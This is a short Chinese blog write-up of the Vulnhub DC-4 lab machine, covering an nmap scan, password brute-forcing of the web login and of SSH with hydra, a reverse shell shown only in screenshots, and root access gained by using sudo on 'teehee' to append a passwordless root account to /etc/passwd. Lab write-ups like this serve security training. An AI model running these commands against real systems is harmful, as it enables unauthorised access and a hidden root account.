Vulnhub:DC-4靶机

kali:192.168.111.111

靶机:192.168.111.251

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.251

image

访问目标网站发现需要登录

image

使用账号admin爆破出密码:happy

image

登陆后抓包执行反弹shell

image

image

image

提权

在/home/jim/backups目录下发现密码字典

image

利用该字典爆破jim用户密码

hydra -l jim -P pass.txt 192.168.111.251 -s 22 ssh -t 64

image

查看jim用户的邮件发现用户charles的密码:^xHhA&hvim0y

image

charles的sudo权限

image

提权方法:https://gtfobins.github.io/gtfobins/tee/#sudo

image

写入用户到/etc/passwd

echo 'a::0:0::/root:/bin/bash' | sudo -u root teehee -a "/etc/passwd"

image

flag

image

posted @ 2023-04-04 20:30  ctostm  阅读(38)  评论(0)    收藏  举报